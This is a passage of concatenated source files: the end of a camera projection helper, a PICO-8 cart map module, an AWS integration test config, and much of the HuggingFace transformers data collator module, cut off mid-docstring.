projective[2, 3] = (zNear * zFar)
ndc = ortho(0, width, 0, height, zNear, zFar)
perspective = np.matmul(ndc, projective)
return perspective, model_view
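# Illustrative sketch, not part of the original module: round-tripping a
# hand-built projection matrix P = K [R | t] through KRT_from_P. The function
# name and the numbers are hypothetical and only meant to show the expected
# shape of the decomposition.
def _example_krt_round_trip():
    K = np.array([[1000., 0., 800.],
                  [0., 1000., 600.],
                  [0., 0., 1.]])
    Rot = np.eye(3)
    trans = np.array([[0.], [0.], [2.]])
    proj_mat = K.dot(np.hstack([Rot, trans]))
    # Should recover K (normalized), R, and t up to numerical precision
    return KRT_from_P(proj_mat)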
|
pico8/map/map.py
|
lifning/picotool
| 310 |
69610
|
<reponame>lifning/picotool
"""The map section of a PICO-8 cart.
The map region consists of 4096 bytes. The .p8 representation is 32
lines of 256 hexadecimal digits (128 bytes).
The map is 128 tiles wide by 64 tiles high. Each tile is one of the
256 tiles from the spritesheet. Map memory describes the top 32 rows
(128 * 32 = 4096). If the developer draws tiles in the bottom 32 rows,
this is stored in the bottom of the gfx memory region.
"""
__all__ = ['Map']
from .. import util
class Map(util.BaseSection):
"""The map region of a PICO-8 cart."""
HEX_LINE_LENGTH_BYTES = 128
def __init__(self, *args, **kwargs):
"""The initializer.
The Map initializer takes an optional gfx keyword argument
whose value is a reference to the Gfx instance where lower map
data is stored.
"""
self._gfx = None
if 'gfx' in kwargs:
self._gfx = kwargs['gfx']
del kwargs['gfx']
super().__init__(*args, **kwargs)
@classmethod
def empty(cls, version=4, gfx=None):
"""Creates an empty instance.
Args:
version: The PICO-8 file version.
gfx: The Gfx object where lower map data is written.
Returns:
A Map instance.
"""
return cls(data=bytearray(b'\x00' * 4096), version=version, gfx=gfx)
@classmethod
def from_lines(cls, *args, **kwargs):
gfx = None
if 'gfx' in kwargs:
gfx = kwargs['gfx']
del kwargs['gfx']
result = super().from_lines(*args, **kwargs)
result._gfx = gfx
return result
@classmethod
def from_bytes(cls, *args, **kwargs):
gfx = None
if 'gfx' in kwargs:
gfx = kwargs['gfx']
del kwargs['gfx']
result = super().from_bytes(*args, **kwargs)
result._gfx = gfx
return result
def get_cell(self, x, y):
"""Gets the tile ID for a map cell.
Args:
x: The map cell x (column) coordinate. (0-127)
y: The map cell y (row) coordinate. Map must have a Gfx if y > 31.
(0-63)
Returns:
The tile ID for the cell.
"""
assert 0 <= x <= 127
assert (0 <= y <= 31) or ((0 <= y <= 63) and self._gfx is not None)
if y <= 31:
return self._data[y * 128 + x]
return self._gfx._data[4096 + (y - 32) * 128 + x]
def set_cell(self, x, y, val):
"""Sets the tile ID for a map cell.
Args:
x: The map cell x (column) coordinate. (0-127)
y: The map cell y (row) coordinate. (0-63) If y > 31, Map must have a
Gfx, and this method updates the shared data region in the Gfx.
val: The new tile ID for the cell. (0-255)
"""
assert 0 <= x <= 127
assert (0 <= y <= 31) or ((0 <= y <= 63) and self._gfx is not None)
assert 0 <= val <= 255
if y <= 31:
self._data[y * 128 + x] = val
else:
self._gfx._data[4096 + (y - 32) * 128 + x] = val
def get_rect_tiles(self, x, y, width=1, height=1):
"""Gets a rectangle of map tiles.
The map is a grid of 128x32 tiles, or 128x64 if using the
gfx/map shared memory for map data. This method returns a
rectangle of tile IDs on the map, as a list of bytearrays.
If the requested rectangle size goes off the edge of the map,
the off-edge tiles are returned as 0. The bottom edge is
always assumed to be beyond the 64th row in the gfx/map shared
memory region.
Args:
x: The map cell x (column) coordinate. (0-127)
y: The map cell y (row) coordinate. (0-63) If y + height > 31, Map
must have a Gfx.
width: The width of the rectangle, as a number of tiles.
height: The height of the rectangle, as a number of tiles.
Returns:
The rectangle of tile IDs, as a list of bytearrays.
"""
assert 0 <= x <= 127
assert 1 <= width
assert 1 <= height
assert ((0 <= y + height <= 32) or
((0 <= y + height <= 64) and self._gfx is not None))
result = []
for tile_y in range(y, y + height):
row = bytearray()
for tile_x in range(x, x + width):
if (tile_y > 63) or (tile_x > 127):
row.append(0)
else:
row.append(self.get_cell(tile_x, tile_y))
result.append(row)
return result
def set_rect_tiles(self, rect, x, y):
"""Writes a rectangle of tiles to the map.
If writing the given rectangle at the given coordinates causes
        the rectangle to extend off the edge of the map, the remainder
is discarded.
Args:
rect: A rectangle of tile IDs, as an iterable of iterables of IDs.
x: The map tile x coordinate (column) of the upper left corner to
start writing.
y: The map tile y coordinate (row) of the upper left corner to
start writing.
"""
for tile_y, row in enumerate(rect):
for tile_x, val in enumerate(row):
if ((tile_y + y) > 127) or ((tile_x + x) > 127):
continue
self.set_cell(tile_x + x, tile_y + y, val)
def get_rect_pixels(self, x, y, width=1, height=1):
"""Gets a rectangel of map tiles as pixels.
This is similar to get_rect_tiles() except the tiles are
extracted from Gfx data and returned as a rectangle of pixels.
Just like PICO-8, tile ID 0 is rendered as empty (all 0's),
not the actual tile at ID 0.
Args:
x: The map cell x (column) coordinate. (0-127)
y: The map cell y (row) coordinate. (0-63) If y + height > 31, Map
must have a Gfx.
width: The width of the rectangle, as a number of tiles.
height: The height of the rectangle, as a number of tiles.
Returns:
The rectangle of pixels, as a list of bytearrays of pixel colors.
"""
assert self._gfx is not None
assert 0 <= x <= 127
assert 1 <= width
assert 1 <= height
assert 0 <= y + height <= 64
tile_rect = self.get_rect_tiles(x, y, width, height)
result = []
for tile_row in tile_rect:
pixel_row = [bytearray(), bytearray(), bytearray(), bytearray(),
bytearray(), bytearray(), bytearray(), bytearray()]
for id in tile_row:
if id == 0:
sprite = [bytearray(b'\x00' * 8)] * 8
else:
sprite = self._gfx.get_sprite(id)
for i in range(0, 8):
pixel_row[i].extend(sprite[i])
for i in range(0, 8):
result.append(pixel_row[i])
return result
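# Illustrative sketch, not part of the original module: the shared-memory
# addressing used by get_cell/set_cell, written out as plain index math.
# The helper name is hypothetical.
def _map_cell_offset_sketch(x, y):
    """Return (region, byte_offset) for a map cell.

    Rows 0-31 live in map memory; rows 32-63 live in the bottom half of the
    gfx region, starting at byte 4096 of the gfx data.
    """
    if y <= 31:
        return ('map', y * 128 + x)
    return ('gfx', 4096 + (y - 32) * 128 + x)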
|
atlas/aws_utils/src/integration/config.py
|
DeepLearnI/atlas
| 296 |
69628
|
<filename>atlas/aws_utils/src/integration/config.py<gh_stars>100-1000
from uuid import uuid4
# separates test runs
TEST_UUID = str(uuid4())
def _code_bucket():
return 'foundations-code-test'
def make_code_bucket():
from foundations import PrefixedBucket
from foundations_aws import AWSBucket
return PrefixedBucket(TEST_UUID, AWSBucket, _code_bucket())
def _result_bucket():
return 'foundations-results-test'
def make_result_bucket():
from foundations import PrefixedBucket
from foundations_aws import AWSBucket
return PrefixedBucket(TEST_UUID, AWSBucket, _result_bucket())
def _config():
from foundations import config_manager
from foundations import PrefixedBucket, BucketPipelineArchive, BucketPipelineListing
from foundations_aws import AWSBucket
# archive implementations
archive_implementation = {
'archive_type': BucketPipelineArchive,
'constructor_arguments': [PrefixedBucket, TEST_UUID, AWSBucket, _result_bucket()],
}
config_manager['archive_listing_implementation'] = {
'archive_listing_type': BucketPipelineListing,
'constructor_arguments': [PrefixedBucket, TEST_UUID, AWSBucket, _result_bucket()],
}
config_manager['stage_log_archive_implementation'] = archive_implementation
config_manager['persisted_data_archive_implementation'] = archive_implementation
config_manager['provenance_archive_implementation'] = archive_implementation
config_manager['job_source_archive_implementation'] = archive_implementation
config_manager['artifact_archive_implementation'] = archive_implementation
config_manager['miscellaneous_archive_implementation'] = archive_implementation
config_manager['run_script_environment'] = {'enable_stages': True}
# quiet logs
config_manager['log_level'] = 'ERROR'
_config()
|
src/transformers/data/data_collator.py
|
manuelciosici/transformers
| 8,028 |
69629
|
<reponame>manuelciosici/transformers
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import warnings
from collections.abc import Mapping
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, NewType, Optional, Tuple, Union
from ..models.bert import BertTokenizer, BertTokenizerFast
from ..tokenization_utils_base import PreTrainedTokenizerBase
from ..utils import PaddingStrategy
InputDataClass = NewType("InputDataClass", Any)
"""
A DataCollator is a function that takes a list of samples from a Dataset and collates them into a batch, as a dictionary
of PyTorch/TensorFlow tensors or NumPy arrays.
"""
DataCollator = NewType("DataCollator", Callable[[List[InputDataClass]], Dict[str, Any]])
class DataCollatorMixin:
def __call__(self, features, return_tensors=None):
if return_tensors is None:
return_tensors = self.return_tensors
if return_tensors == "tf":
return self.tf_call(features)
elif return_tensors == "pt":
return self.torch_call(features)
elif return_tensors == "np":
return self.numpy_call(features)
else:
raise ValueError(f"Framework '{return_tensors}' not recognized!")
def default_data_collator(features: List[InputDataClass], return_tensors="pt") -> Dict[str, Any]:
"""
Very simple data collator that simply collates batches of dict-like objects and performs special handling for
potential keys named:
- `label`: handles a single value (int or float) per object
- `label_ids`: handles a list of values per object
Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs
to the model. See glue and ner for example of how it's useful.
"""
# In this function we'll make the assumption that all `features` in the batch
# have the same attributes.
# So we will look at the first element as a proxy for what attributes exist
# on the whole batch.
if return_tensors == "pt":
return torch_default_data_collator(features)
elif return_tensors == "tf":
return tf_default_data_collator(features)
elif return_tensors == "np":
return numpy_default_data_collator(features)
@dataclass
class DefaultDataCollator(DataCollatorMixin):
"""
Very simple data collator that simply collates batches of dict-like objects and performs special handling for
potential keys named:
- `label`: handles a single value (int or float) per object
- `label_ids`: handles a list of values per object
Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs
to the model. See glue and ner for example of how it's useful.
This is an object (like other data collators) rather than a pure function like default_data_collator. This can be
helpful if you need to set a return_tensors value at initialization.
Args:
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
return_tensors: str = "pt"
def __call__(self, features: List[Dict[str, Any]], return_tensors=None) -> Dict[str, Any]:
if return_tensors is None:
return_tensors = self.return_tensors
return default_data_collator(features, return_tensors)
def torch_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import torch
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if type(first["label_ids"][0]) is int else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
else:
batch[k] = torch.tensor([f[k] for f in features])
return batch
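# Illustrative sketch, not part of the library: a minimal call to
# `default_data_collator` on two dict-like features, showing how `label`
# becomes a batched `labels` tensor and how list-valued keys are stacked.
# The function name and the toy feature values are made up for illustration.
def _example_default_collation():
    features = [
        {"label": 0, "input_ids": [1, 2, 3]},
        {"label": 1, "input_ids": [4, 5, 6]},
    ]
    # Returns {"labels": tensor([0, 1]), "input_ids": tensor([[1, 2, 3], [4, 5, 6]])}
    return default_data_collator(features, return_tensors="pt")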
def tf_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import numpy as np
import tensorflow as tf
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label_col_name = "label"
elif "label_ids" in first and first["label_ids"] is not None:
label_col_name = "label_ids"
elif "labels" in first and first["labels"] is not None:
label_col_name = "labels"
else:
label_col_name = None
if label_col_name is not None:
if isinstance(first[label_col_name], tf.Tensor):
            dtype = tf.int64 if first[label_col_name].dtype.is_integer else tf.float32
elif isinstance(first[label_col_name], np.ndarray) or isinstance(first[label_col_name], np.generic):
dtype = tf.int64 if np.issubdtype(first[label_col_name].dtype, np.integer) else tf.float32
elif isinstance(first[label_col_name], (tuple, list)):
dtype = tf.int64 if isinstance(first[label_col_name][0], int) else tf.float32
else:
dtype = tf.int64 if isinstance(first[label_col_name], int) else tf.float32
batch["labels"] = tf.convert_to_tensor([f[label_col_name] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids", "labels") and v is not None and not isinstance(v, str):
if isinstance(v, (tf.Tensor, np.ndarray)):
batch[k] = tf.stack([f[k] for f in features])
else:
batch[k] = tf.convert_to_tensor([f[k] for f in features])
return batch
def numpy_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import numpy as np
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], np.ndarray) else first["label"]
dtype = np.int64 if isinstance(label, int) else np.float32
batch["labels"] = np.array([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], np.ndarray):
batch["labels"] = np.stack([f["label_ids"] for f in features])
else:
dtype = np.int64 if type(first["label_ids"][0]) is int else np.float32
batch["labels"] = np.array([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, np.ndarray):
batch[k] = np.stack([f[k] for f in features])
else:
batch[k] = np.array([f[k] for f in features])
return batch
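# Illustrative usage sketch (not part of the collator implementations above; the
# checkpoint name and feature values are just examples). It shows how the default
# collators turn a list of same-length feature dicts into a single batch, with
# "label" promoted to "labels" of the appropriate dtype.
#
#   from transformers import AutoTokenizer
#   tok = AutoTokenizer.from_pretrained("bert-base-uncased")
#   enc = tok(["a short sentence", "another one"], padding="max_length", max_length=8)
#   features = [
#       {"input_ids": ids, "attention_mask": mask, "label": i}
#       for i, (ids, mask) in enumerate(zip(enc["input_ids"], enc["attention_mask"]))
#   ]
#   batch = torch_default_data_collator(features)  # or tf_/numpy_default_data_collator
#   # batch["labels"] -> tensor([0, 1]); batch["input_ids"].shape -> (2, 8)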
@dataclass
class DataCollatorWithPadding:
"""
Data collator that will dynamically pad the inputs received.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'` (default): Pad to the longest sequence in the batch (or no padding if only a single
sequence is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'`: No padding (i.e., can output a batch with sequences of different lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
return_tensors: str = "pt"
def __call__(self, features: List[Dict[str, Any]]) -> Dict[str, Any]:
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors=self.return_tensors,
)
if "label" in batch:
batch["labels"] = batch["label"]
del batch["label"]
if "label_ids" in batch:
batch["labels"] = batch["label_ids"]
del batch["label_ids"]
return batch
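# Illustrative usage sketch for DataCollatorWithPadding (the checkpoint name is an
# example): unlike the default collators, features may have different lengths,
# because padding is applied per batch via `tokenizer.pad`.
#
#   from transformers import AutoTokenizer
#   tok = AutoTokenizer.from_pretrained("bert-base-uncased")
#   collator = DataCollatorWithPadding(tok, pad_to_multiple_of=8, return_tensors="pt")
#   features = [tok("short"), tok("a noticeably longer input sentence")]
#   batch = collator(features)
#   # batch["input_ids"].shape[1] is the longest length, rounded up to a multiple of 8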
@dataclass
class DataCollatorForTokenClassification(DataCollatorMixin):
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence
is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (`int`, *optional*, defaults to -100):
            The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
def torch_call(self, features):
import torch
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="pt" if labels is None else None,
)
if labels is None:
return batch
sequence_length = torch.tensor(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch[label_name] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch[label_name] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: torch.tensor(v, dtype=torch.int64) for k, v in batch.items()}
return batch
def tf_call(self, features):
import tensorflow as tf
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="tf" if labels is None else None,
)
if labels is None:
return batch
sequence_length = tf.convert_to_tensor(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch["labels"] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch["labels"] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: tf.convert_to_tensor(v, dtype=tf.int64) for k, v in batch.items()}
return batch
def numpy_call(self, features):
import numpy as np
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="np" if labels is None else None,
)
if labels is None:
return batch
sequence_length = np.array(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch["labels"] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch["labels"] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: np.array(v, dtype=np.int64) for k, v in batch.items()}
return batch
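# Illustrative usage sketch for DataCollatorForTokenClassification (label values
# are arbitrary examples): word-level labels are padded with label_pad_token_id
# (-100) up to the padded sequence length, so loss functions skip padding positions.
#
#   from transformers import AutoTokenizer
#   tok = AutoTokenizer.from_pretrained("bert-base-uncased")
#   collator = DataCollatorForTokenClassification(tok, return_tensors="pt")
#   features = [
#       {**tok("New York"), "labels": [0, 1, 1, 0]},   # [CLS] new york [SEP]
#       {**tok("Paris"), "labels": [0, 1, 0]},         # [CLS] paris [SEP]
#   ]
#   batch = collator(features)  # "labels" padded to the same width as "input_ids"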
def _torch_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
import numpy as np
import torch
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple, np.ndarray)):
examples = [torch.tensor(e, dtype=torch.long) for e in examples]
length_of_first = examples[0].size(0)
# Check if padding is necessary.
are_tensors_same_length = all(x.size(0) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return torch.stack(examples, dim=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(x.size(0) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0] :] = example
return result
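# Illustrative sketch of _torch_collate_batch behaviour (values are examples):
# unequal-length sequences are padded with the tokenizer's pad token on the side
# given by tokenizer.padding_side, and the width can be rounded up to a multiple.
#
#   from transformers import AutoTokenizer
#   tok = AutoTokenizer.from_pretrained("bert-base-uncased")
#   examples = [[5, 6, 7], [8, 9]]
#   batch = _torch_collate_batch(examples, tok, pad_to_multiple_of=4)
#   # shape (2, 4); with right padding the second row becomes [8, 9, pad, pad]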
def _tf_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
import numpy as np
import tensorflow as tf
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [tf.convert_to_tensor(e, dtype=tf.int64) for e in examples]
# Check if padding is necessary.
length_of_first = len(examples[0])
are_tensors_same_length = all(len(x) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return tf.stack(examples, axis=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(len(x) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
# result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
result = []
rank = tf.rank(examples[0])
paddings = np.zeros((rank, 2), dtype=np.int32)
for example in examples:
if tokenizer.padding_side == "right":
paddings[0, 1] = max_length - len(example)
else:
paddings[0, 0] = max_length - len(example)
result.append(tf.pad(example, paddings, constant_values=tokenizer.pad_token_id))
return tf.stack(result, axis=0)
def _numpy_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
import numpy as np
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [np.array(e, dtype=np.int64) for e in examples]
# Check if padding is necessary.
length_of_first = len(examples[0])
are_tensors_same_length = all(len(x) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return np.stack(examples, axis=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(len(x) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
result = np.full(shape=(len(examples), max_length), fill_value=tokenizer.pad_token_id, dtype=examples[0].dtype)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0] :] = example
return result
def tolist(x):
if isinstance(x, list):
return x
elif hasattr(x, "numpy"): # Checks for TF tensors without needing the import
x = x.numpy()
return x.tolist()
@dataclass
class DataCollatorForSeq2Seq:
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
model ([`PreTrainedModel`]):
The model that is being trained. If set and has the *prepare_decoder_input_ids_from_labels*, use it to
prepare the *decoder_input_ids*
This is useful when using *label_smoothing* to avoid calculating loss twice.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence
is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (`int`, *optional*, defaults to -100):
The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
model: Optional[Any] = None
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
def __call__(self, features, return_tensors=None):
import numpy as np
if return_tensors is None:
return_tensors = self.return_tensors
labels = [feature["labels"] for feature in features] if "labels" in features[0].keys() else None
# We have to pad the labels before calling `tokenizer.pad` as this method won't pad them and needs them of the
# same length to return tensors.
if labels is not None:
max_label_length = max(len(l) for l in labels)
if self.pad_to_multiple_of is not None:
max_label_length = (
(max_label_length + self.pad_to_multiple_of - 1)
// self.pad_to_multiple_of
* self.pad_to_multiple_of
)
padding_side = self.tokenizer.padding_side
for feature in features:
remainder = [self.label_pad_token_id] * (max_label_length - len(feature["labels"]))
if isinstance(feature["labels"], list):
feature["labels"] = (
feature["labels"] + remainder if padding_side == "right" else remainder + feature["labels"]
)
elif padding_side == "right":
feature["labels"] = np.concatenate([feature["labels"], remainder]).astype(np.int64)
else:
feature["labels"] = np.concatenate([remainder, feature["labels"]]).astype(np.int64)
features = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors=return_tensors,
)
# prepare decoder_input_ids
if (
labels is not None
and self.model is not None
and hasattr(self.model, "prepare_decoder_input_ids_from_labels")
):
decoder_input_ids = self.model.prepare_decoder_input_ids_from_labels(labels=features["labels"])
features["decoder_input_ids"] = decoder_input_ids
return features
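# Illustrative usage sketch for DataCollatorForSeq2Seq (checkpoint names are example
# choices): label sequences are padded with -100 before calling `tokenizer.pad`, and
# when the model exposes `prepare_decoder_input_ids_from_labels`, decoder inputs are
# derived from the padded labels.
#
#   from transformers import AutoModelForSeq2SeqLM, AutoTokenizer
#   tok = AutoTokenizer.from_pretrained("t5-small")
#   model = AutoModelForSeq2SeqLM.from_pretrained("t5-small")
#   collator = DataCollatorForSeq2Seq(tok, model=model)
#   features = [
#       {"input_ids": tok("translate English to German: hello").input_ids,
#        "labels": tok("hallo").input_ids},
#       {"input_ids": tok("translate English to German: thank you").input_ids,
#        "labels": tok("danke").input_ids},
#   ]
#   batch = collator(features)  # contains padded "labels" and "decoder_input_ids"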
@dataclass
class DataCollatorForLanguageModeling(DataCollatorMixin):
"""
Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they
are not all of the same length.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
mlm (`bool`, *optional*, defaults to `True`):
Whether or not to use masked language modeling. If set to `False`, the labels are the same as the inputs
with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for non-masked
tokens and the value to predict for the masked token.
mlm_probability (`float`, *optional*, defaults to 0.15):
The probability with which to (randomly) mask tokens in the input, when `mlm` is set to `True`.
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
<Tip>
